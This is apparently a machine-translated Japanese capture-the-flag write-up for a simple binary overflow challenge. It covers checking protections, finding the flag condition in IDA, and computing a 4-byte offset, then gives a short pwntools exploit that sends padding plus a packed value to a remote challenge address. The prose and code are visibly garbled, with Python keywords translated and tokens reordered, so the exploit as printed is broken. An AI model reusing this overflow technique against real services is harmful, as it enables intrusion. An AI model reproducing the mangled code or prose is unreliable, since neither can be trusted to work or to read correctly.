ファイルの種類かどうかを確認するためにプロセスを取ります
64、NXを開きます
直接スローIDA分析
ビューsub_400686()
dword_60106C == 1853186401の文がフラグを得ることができる場合、関数へのフラグである、我々は、条件が満たされていることがわかります。
計算オフセット
0x6C、0x68 = 0x4の4を直接EXP次の書き込みを覆うように単純な変数をオフセットされます
EXP:
PWNインポート*から
P =リモート( '111.198.29.45'、32077)
。進数(また、行をオンにしない)になっペイロード= 'A' 4 * + P64(0x6E756161)// 1853186401
p.recvuntil( " BOFのためのHelloWorldをGETすることができます\) "N-
p.sendline(ペイロード)
p.interactiveを()